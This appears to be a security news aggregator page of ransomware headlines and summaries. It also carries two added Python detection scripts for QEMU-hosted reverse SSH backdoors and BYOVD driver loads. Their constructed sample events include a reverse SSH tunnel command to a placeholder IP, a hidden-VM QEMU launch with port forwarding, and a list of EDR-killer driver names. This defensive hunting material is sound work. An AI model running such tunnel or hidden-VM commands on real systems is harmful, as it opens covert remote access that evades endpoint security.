CISO Brief

All news with #ransomware tag

419 articles · page 3 of 21

NAKIVO v11.2 Adds Ransomware Defenses and vSphere 9 Support

🔒 NAKIVO has released Backup & Replication v11.2, introducing an automated real-time replication engine and expanded hypervisor support. The update delivers full compatibility with VMware vSphere 9 and Proxmox VE 9.0 (with 9.1 in scope), plus immutable backups, pre-recovery malware scanning, and air-gapped options to strengthen ransomware resilience. v11.2 also adopts OAuth 2.0 for email notifications and upgrades core platform components to improve stability and recovery speed.

Payouts King Abuses QEMU VMs to Evade Endpoint Security

🛡️ Researchers report the Payouts King ransomware is abusing QEMU to run hidden Alpine Linux VMs that host a reverse SSH backdoor, executing tooling inside the guest to bypass host security. Operators create a scheduled task named TPMProfiler that launches the VM as SYSTEM, keep the virtual disks on disk disguised as benign files, and forward ports into the guest for remote access. The campaign, linked to STAC4713 and observed alongside separate STAC3725 activity exploiting CitrixBleed 2, employs credential theft, heavy obfuscation, and AES-256/RSA-4096 encryption. Sophos recommends hunting for unauthorized QEMU installs, suspicious tasks that run as SYSTEM, and unusual SSH tunnels.
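The three hunts Sophos recommends map directly onto telemetry most Windows estates already collect. The script below is an added example, not code from Sophos or the article: it runs over constructed Windows Security event 4698 (scheduled task created, which carries the task definition XML) and Sysmon Event ID 1 (process creation) records and flags scheduled tasks whose action launches QEMU (raised to high when the principal is SYSTEM), QEMU binaries running outside an assumed sanctioned install directory, disk images whose file extension does not look like a disk, QEMU user-mode `hostfwd=` port forwards, and `ssh` invocations carrying -R/-L/-D tunnel flags. The install directory, the sample paths and task names, and the use of `hostfwd` as the port-forwarding mechanism are assumptions about how such a setup typically looks, not details taken from the report.

```python
"""Hunt Windows telemetry for QEMU-hosted reverse-SSH backdoors (added example).

Event shapes (Security 4698 TaskContent XML, Sysmon Event ID 1) are real;
every record in SAMPLE_EVENTS is constructed for illustration.
"""
import re
import shlex
import xml.etree.ElementTree as ET

TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
SYSTEM_SID = "S-1-5-18"
EXPECTED_QEMU_DIR = "c:/program files/qemu/"   # assumption: the only sanctioned install
# Extensions a legitimate QEMU disk normally carries; anything else matches the
# "virtual disk disguised as a benign file" tactic from the report.
DISK_EXTS = {".qcow2", ".img", ".raw", ".vmdk", ".vdi", ".vhd", ".vhdx", ".iso"}
SSH_TUNNEL_FLAGS = {"-R", "-L", "-D"}          # reverse / local / dynamic forwards


def _norm(path):
    return path.strip('"').replace("\\", "/").lower()


def check_task_created(ev):
    """Security 4698: flag tasks whose action launches QEMU; SYSTEM principal raises severity."""
    root = ET.fromstring(ev["TaskContent"])
    user = root.findtext(".//t:Principals/t:Principal/t:UserId", default="", namespaces=TASK_NS)
    findings = []
    for cmd in root.iterfind(".//t:Actions/t:Exec/t:Command", TASK_NS):
        exe = _norm(cmd.text or "")
        if "qemu" in exe.rsplit("/", 1)[-1]:
            sev = "high" if user == SYSTEM_SID else "medium"
            findings.append((sev, f"task {ev['TaskName']} launches QEMU ({exe}) as {user or '?'}"))
    return findings


def check_process_created(ev):
    """Sysmon 1: unauthorized QEMU path, disguised disks, host port-forwards, ssh tunnels."""
    image = _norm(ev["Image"])
    exe = image.rsplit("/", 1)[-1]
    try:
        argv = shlex.split(ev["CommandLine"], posix=False)   # keep Windows backslashes intact
    except ValueError:                                       # unbalanced quotes: degrade gracefully
        argv = ev["CommandLine"].split()
    findings = []
    if exe.startswith("qemu-system"):
        if not image.startswith(EXPECTED_QEMU_DIR):
            findings.append(("high", f"QEMU running from unexpected path {ev['Image']}"))
        for i, arg in enumerate(argv[:-1]):
            nxt = argv[i + 1]
            disk = None
            if arg.lower() in ("-hda", "-hdb", "-cdrom"):
                disk = nxt
            elif arg.lower() == "-drive":
                m = re.search(r"file=([^,]+)", nxt)
                disk = m.group(1) if m else None
            if disk:
                name = _norm(disk).rsplit("/", 1)[-1]
                ext = name[name.rfind("."):] if "." in name else ""
                if ext not in DISK_EXTS:
                    findings.append(("high", f"QEMU disk with non-disk extension: {disk}"))
            # hostfwd= exposes a guest port on the host: how a VM-hosted sshd becomes reachable
            if arg.lower() == "-netdev" and "hostfwd=" in nxt.lower():
                findings.append(("medium", f"QEMU host port-forward: {nxt}"))
    elif exe in ("ssh.exe", "ssh"):
        hits = [a for a in argv if a[:2] in SSH_TUNNEL_FLAGS]   # catches both "-R" and "-R4444:..."
        if hits:
            findings.append(("high", f"ssh tunnel flags {hits}: {ev['CommandLine']}"))
    return findings


def hunt(events):
    """Dispatch on event type; return (severity, message) findings in input order."""
    findings = []
    for ev in events:
        if ev["EventID"] == 4698:
            findings += check_task_created(ev)
        elif ev["EventID"] == 1:
            findings += check_process_created(ev)
    return findings


# Constructed sample telemetry (not real log data); paths and task names are assumptions.
_TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Principals><Principal id="Author"><UserId>{user}</UserId><RunLevel>HighestAvailable</RunLevel></Principal></Principals>
  <Actions Context="Author"><Exec><Command>{cmd}</Command></Exec></Actions>
</Task>"""

SAMPLE_EVENTS = [
    {"EventID": 4698, "TaskName": r"\TPMProfiler",
     "TaskContent": _TASK_XML.format(user=SYSTEM_SID, cmd=r"C:\ProgramData\Intel\qemu-system-x86_64.exe")},
    {"EventID": 1, "Image": r"C:\ProgramData\Intel\qemu-system-x86_64.exe",
     "CommandLine": r"C:\ProgramData\Intel\qemu-system-x86_64.exe -hda C:\ProgramData\Intel\tpm_cache.dat "
                    r"-netdev user,id=n1,hostfwd=tcp::2222-:22 -device e1000,netdev=n1 -display none"},
    {"EventID": 1, "Image": r"C:\Program Files\qemu\qemu-system-x86_64.exe",          # benign developer VM
     "CommandLine": r'"C:\Program Files\qemu\qemu-system-x86_64.exe" -hda C:\VMs\dev.qcow2 -m 2048'},
    {"EventID": 1, "Image": r"C:\Windows\System32\OpenSSH\ssh.exe",
     "CommandLine": r"ssh.exe -N -R 4444:localhost:22 op@203.0.113.10"},
    {"EventID": 4698, "TaskName": r"\Microsoft\Windows\Example",                        # benign SYSTEM task
     "TaskContent": _TASK_XML.format(user=SYSTEM_SID, cmd=r"C:\Windows\System32\cmd.exe")},
]

if __name__ == "__main__":
    for sev, msg in hunt(SAMPLE_EVENTS):
        print(f"[{sev}] {msg}")
```

Run against the constructed records it reports five findings: the SYSTEM task, three for the hidden VM launch (unexpected path, a `.dat` backing file, and the `hostfwd` forward), and the reverse tunnel; the developer VM and the benign SYSTEM task produce nothing. The task name and install path are the weakest signals because the operator chooses them; the disk-extension, port-forward and `-R` checks survive renaming.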

Webinar: Why MSPs Must Rethink Security and Recovery

🔒 BleepingComputer will host a live webinar on May 14, 2026 at 2:00 PM ET that examines why managed service providers must align security and recovery strategies. Experts from Kaseya will explain how AI-driven phishing, BEC, and ransomware are evading traditional controls and how integrating backup and disaster recovery with detection reduces downtime. Attendees will receive practical guidance to strengthen MSP cyber resilience.

Ransomware Emerges as Top Threat to Automotive Sector

🔒 A new report from Halcyon warns that ransomware has become the fastest-growing and most disruptive cyber threat to the automotive sector, accounting for 44% of attacks on carmakers in 2025 after incidents more than doubled that year. The vendor links the surge to connected vehicle platforms, OTA update mechanisms, cloud services and insecure third-party suppliers. Recommended mitigations include patching edge devices, deploying phishing-resistant MFA, hardening EDR, maintaining immutable offline backups and enforcing supplier security requirements.

Rolling Networks: Securing Cyber Risks in Transport

🚚 Modern trucks are "rolling networks" loaded with communications systems, sensors, cloud-connected devices and Wi-Fi, creating expansive attack surfaces. Ben Wilkens of NMFTA warns that cybercriminals exploit the sector’s uptime pressure with ransomware, extortion and cyber-enabled cargo theft. Core hygiene—MFA, network segmentation, social engineering training and timely patching—can significantly reduce risk but must be adapted for small carriers. NMFTA advances research, guidance and an annual conference to help the industry collaborate and strengthen defenses.

7 Biggest Healthcare Security Threats and Emerging Risks

🔒 Cyberattacks on healthcare have surged since COVID-19, driven by telehealth adoption, cloud migration, and interconnected medical devices. Experts identify seven primary threats — ransomware, cloud misconfigurations, web application exploits, bad bots, phishing, insecure smart devices, and generative AI misuse — that target EHRs, PHI, and clinical availability. Under-resourced teams and extensive third-party dependencies amplify the operational and patient-safety impacts.

Manufacturing Cybersecurity: Complexity Surges in 2025

🔒 The global manufacturing sector entered 2025 confronting one of the most aggressive cyber threat environments in its history. Digital transformation, smart factories, and interconnected supply chains have expanded operational reach but introduced unprecedented attack surfaces, making ransomware and supply-chain compromises a primary concern. According to the Manufacturing Threat Landscape 2025 report, incidents rose sharply year over year, placing manufacturing at the center of global ransomware activity and forcing organizations to reassess defenses and incident readiness.

Securing Manufacturing Operations Against Ransomware in 2026

🔒 Modern manufacturing is increasingly targeted by fast, high-impact cyberattacks: Clorox production lines went dark in 2023, and in 2025 a global automaker halted factories across five countries after an intrusion that began with stolen credentials. Ransomware incidents against manufacturers rose 56% in 2025, with average European demands exceeding $1.16 million. The analysis highlights structural weaknesses (legacy OT, credential sprawl, and inadequate segmentation) and recommends pragmatic, non-disruptive defenses that protect operations without causing downtime.

Dutch EHR Vendor ChipSoft Disrupts Services After Ransomware

🔒 Dutch healthcare software vendor ChipSoft has confirmed a ransomware incident that forced it to take its website and patient-facing digital services offline. The provider of the HiX EHR platform warned of "possible unauthorized access" and advised customers to disconnect affected systems while it investigates. The national healthcare CERT, Z-CERT, is coordinating response efforts with ChipSoft and impacted hospitals.

Talos Takes: 2025 Ransomware Trends and Vulnerabilities

🔒 Talos analysts Amy Ciminnisi and Pierre Cadieux review the ransomware and vulnerability patterns that shaped 2025. They emphasize persistent campaigns against the manufacturing sector, increased targeting of management infrastructure, and the rise of stealthy living-off-the-land techniques that evade traditional controls. The hosts explain how to spot the difference between a system administrator and a threat actor and outline steps organizations can take to move beyond reactive defenses toward a more resilient, proactive security posture.

Storm-1175 (Medusa) Accelerates Ransomware Attacks

⚠️ Microsoft warns that Storm-1175 — an actor linked to Medusa ransomware — is rapidly exploiting internet-facing systems, often moving from initial access to data theft and encryption within 24 hours. The group has abused more than 16 vulnerabilities since 2023, including zero-days, and frequently chains exploits to establish persistence and accelerate operations. Targets include healthcare, education, professional services, and finance in Australia, the UK and the US.

Storm-1175 Weaponizes n-day and Zero-day Flaws Worldwide

⚠️ Microsoft says financially motivated actor Storm-1175 has run a high-tempo campaign that weaponizes both n-day and zero-day vulnerabilities to deliver Medusa ransomware against internet-facing systems. The group has exploited at least 16 flaws since 2023, including the zero-day CVE-2025-10035 affecting GoAnywhere MFT, and has impacted healthcare, education, professional services and finance in Australia, the UK and the US. Recommended protections include perimeter scanning, isolating web-facing systems behind VPNs, WAFs or a DMZ, enforcing MFA for RMM tools, enabling tamper protection and configuring XDR to detect and block common ransomware tactics.

Storm-1175 Targets Vulnerable Web-Facing Assets with Medusa

🔒 Storm-1175 conducts high-tempo ransomware campaigns that rapidly weaponize recently disclosed and, in some cases, pre-disclosure zero-day vulnerabilities to gain initial access to web-facing systems. After exploitation the actor moves quickly to establish persistence, perform credential theft, tamper with security controls, and exfiltrate data before deploying Medusa ransomware. Microsoft observed intrusions affecting healthcare, education, professional services, and finance across Australia, the United Kingdom, and the United States, often completing impact within days or less. Recommended defenses include perimeter asset discovery, robust patching, RMM hardening, and tamper protection for endpoint security.

Qilin and Warlock Ransomware Use Vulnerable Drivers

🔒 Cisco Talos and Trend Micro say the Qilin and Warlock ransomware groups have adopted a bring-your-own-vulnerable-driver (BYOVD) approach to disable endpoint security on compromised hosts. Talos identified a malicious msimg32.dll that, once side-loaded, runs a PE loader which decrypts and executes an in-memory EDR killer. The payload leverages renamed drivers such as rwdrv.sys (a repackaged ThrottleStop.sys) and hlpdrv.sys to access physical memory and terminate over 300 EDR drivers. Warlock has similarly used NSecKrnl.sys and a suite of legitimate tools to persist, move laterally, and exfiltrate data.

BKA Identifies REvil Leaders Behind 130 Attacks in Germany

🕵️ Germany's Federal Criminal Police Office (BKA) has named the alleged primary operators of the REvil (aka Sodinokibi) ransomware ring as Daniil Maksimovich Shchukin and Anatoly Sergeevitsch Kravchuk. Shchukin, widely known by aliases including UNKN and Oneiilk2, is accused of acting as a group leader, while Kravchuk is alleged to have served as a developer. The BKA links the two to 130 attacks in Germany, €1.9 million in paid ransoms across 25 cases, and total losses exceeding €35.4 million; the announcement follows earlier international actions that disrupted REvil.

Germany Identifies 'UNKN' as Head of REvil and GandCrab

🔍 German authorities have identified 31-year-old Daniil Maksimovich Shchukin as the hacker known as 'UNKN', alleging he led the GandCrab and REvil ransomware operations. The Bundeskriminalamt says Shchukin and an associate extorted nearly €2 million in roughly two dozen attacks between 2019 and 2021, causing over €35 million in damage. Investigators cite cryptocurrency traces, forum links and a mugshot match; he is believed to be abroad, likely in Russia.

Evolution of Ransomware: Multi-Extortion Threats Rise

🔒 Ransomware's shift to multi-extortion is producing real operational harm across healthcare, finance, and manufacturing, with widespread incidents and patient-care disruptions reported in 2025–2026. Attackers now routinely exfiltrate data before encrypting systems, making backups alone insufficient and increasing regulatory and business risk. The article highlights D.AMO from Penta Security, an integrated platform combining kernel-level folder encryption, process-based access control, and independent recovery to render stolen files unreadable, block unauthorized access, and speed restoration.

Researchers Observe Sub-One-Hour Ransomware Attacks

🔒 Halcyon warns that the Akira ransomware group can complete a full attack lifecycle in under an hour, often exploiting vulnerabilities in internet-facing VPN and backup appliances where multi-factor authentication is absent. The group supplements exploits with credential theft, spearphishing, password spraying and initial access brokers, then exfiltrates data before encryption in a double-extortion model. Akira favors stealth and legitimate, widely available tools (FileZilla, WinRAR, WinSCP, Rclone) to archive, stage and exfiltrate data; organizations should adopt layered defenses, harden third-party access, monitor for exfiltration and deploy dedicated anti-ransomware protections.

ThreatsDay Bulletin: Pre-auth Chains and Supply-Chain Risks

📰 The ThreatsDay Bulletin highlights immediate, actionable risks including a pre-auth RCE chain in Progress ShareFile (CVE-2026-2699/CVE-2026-2701), unpatched ImageMagick zero-days enabling RCE, and novel CloudTrail evasion techniques that erase forensic visibility. It also details widespread mobile-rootkit campaigns, a sharp rise in open-source and supply-chain malware advisories, and phishing apps abusing distribution services to harvest credentials. Defenders should prioritize patching, sandboxing ingest pipelines, and hunting for signs of chained low-and-slow techniques and suspicious AWS API activity.

Qilin EDR Killer: Multi-Stage msimg32.dll Loader Analysis

🔍 This Talos analysis dissects a malicious msimg32.dll used in Qilin ransomware attacks, detailing a multi-stage PE loader that evades and disables endpoint detection and response (EDR) solutions. The loader employs SEH/VEH obfuscation, syscall-stub reuse, and paging-file-backed sections to decrypt and map payloads entirely in memory without triggering hooks or ETW telemetry. The final EDR killer loads two helper drivers to perform physical memory R/W and to unprotect and terminate guarded processes, enabling it to neutralize over 300 vendor drivers.
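Both the Qilin/Warlock item above and this loader analysis point at two telemetry sources a defender already has: image-load events for msimg32.dll and driver-load events for the helper drivers. The script below is an added example, not Talos' or Trend Micro's tooling. It runs over constructed Sysmon Event ID 7 (image loaded) and Event ID 6 (driver loaded) records, flags msimg32.dll resolving anywhere other than System32 or SysWOW64 (the only places the genuine Windows DLL lives, so a copy beside an application binary is the side-load), and flags driver loads by the names given in the reports, by a caller-supplied SHA-256 blocklist (for instance an export from the LOLDrivers project), and by load path. The placeholder hash, the paths and every event record are constructed.

```python
"""Hunt Sysmon telemetry for the msimg32.dll side-load and BYOVD driver loads (added example).

Event shapes are Sysmon Event ID 7 (image load) and 6 (driver load); every
record in SAMPLE_EVENTS is constructed and CONSTRUCTED_SHA256 is a placeholder.
"""
SYSTEM_DIRS = ("c:/windows/system32/", "c:/windows/syswow64/")
DRIVER_DIR = "c:/windows/system32/drivers/"
# Driver file names the Talos/Trend Micro reporting attributes to the EDR killers.
# ThrottleStop.sys is the legitimate driver that rwdrv.sys repackages.  Operators
# rename freely, so treat this set as a seed for the hunt, not its boundary.
REPORTED_DRIVERS = {"rwdrv.sys", "hlpdrv.sys", "nseckrnl.sys", "throttlestop.sys"}


def _norm(path):
    return path.replace("\\", "/").lower()


def _parse_hashes(field):
    """Sysmon 'Hashes' looks like 'SHA256=...,MD5=...'; return {ALG: lowercase hex}."""
    out = {}
    for part in field.split(","):
        alg, _, val = part.partition("=")
        if val:
            out[alg.strip().upper()] = val.strip().lower()
    return out


def check_image_load(ev):
    """Sysmon 7: msimg32.dll belongs in System32/SysWOW64; anywhere else is a side-load candidate."""
    loaded = _norm(ev["ImageLoaded"])
    if loaded.rsplit("/", 1)[-1] != "msimg32.dll":
        return []
    if any(loaded.startswith(d) for d in SYSTEM_DIRS):
        return []
    return [("high", f"msimg32.dll side-loaded from {ev['ImageLoaded']} into {ev['Image']}")]


def check_driver_load(ev, bad_sha256=frozenset()):
    """Sysmon 6: reported names, blocklisted hashes, and loads from outside the drivers directory.

    BYOVD drivers carry valid signatures by design, so Signed=true is not
    exculpatory and is deliberately not used as a filter here.
    """
    findings = []
    loaded = _norm(ev["ImageLoaded"])
    name = loaded.rsplit("/", 1)[-1]
    sha256 = _parse_hashes(ev.get("Hashes", "")).get("SHA256")
    if name in REPORTED_DRIVERS:
        findings.append(("high", f"driver name from Qilin/Warlock reporting: {ev['ImageLoaded']}"))
    if sha256 and sha256 in bad_sha256:
        findings.append(("high", f"driver hash on vulnerable-driver blocklist: {name} {sha256}"))
    if not loaded.startswith(DRIVER_DIR):
        findings.append(("medium", f"driver loaded from outside {DRIVER_DIR}: {ev['ImageLoaded']}"))
    return findings


def hunt(events, bad_sha256=frozenset()):
    """Dispatch on event type; return (severity, message) findings in input order."""
    findings = []
    for ev in events:
        if ev["EventID"] == 7:
            findings += check_image_load(ev)
        elif ev["EventID"] == 6:
            findings += check_driver_load(ev, bad_sha256)
    return findings


CONSTRUCTED_SHA256 = "ab" * 32   # placeholder standing in for a real blocklist entry

SAMPLE_EVENTS = [  # constructed, not real telemetry; paths are assumptions
    {"EventID": 7, "Image": r"C:\ProgramData\Update\app.exe",
     "ImageLoaded": r"C:\ProgramData\Update\msimg32.dll"},
    {"EventID": 7, "Image": r"C:\Windows\System32\mspaint.exe",              # legitimate load
     "ImageLoaded": r"C:\Windows\System32\msimg32.dll"},
    {"EventID": 6, "ImageLoaded": r"C:\ProgramData\Update\rwdrv.sys",
     "Hashes": f"SHA256={CONSTRUCTED_SHA256.upper()}", "Signed": "true"},
    {"EventID": 6, "ImageLoaded": r"C:\Windows\System32\drivers\tcpip.sys",  # legitimate driver
     "Hashes": "SHA256=" + "00" * 32, "Signed": "true"},
    {"EventID": 6, "ImageLoaded": r"C:\Windows\Temp\hlpdrv.sys",
     "Hashes": "SHA256=" + "11" * 32, "Signed": "true"},
]

if __name__ == "__main__":
    for sev, msg in hunt(SAMPLE_EVENTS, {CONSTRUCTED_SHA256}):
        print(f"[{sev}] {msg}")
```

Without a blocklist the constructed records yield five findings (the side-load, and name plus path hits for the two renamed drivers); supplying the placeholder hash adds a sixth. The name set is the easiest signal to evade, which is why the path check and the hash blocklist are separate rules, and why the side-load of msimg32.dll, which precedes any driver load, is the earlier and more durable detection point.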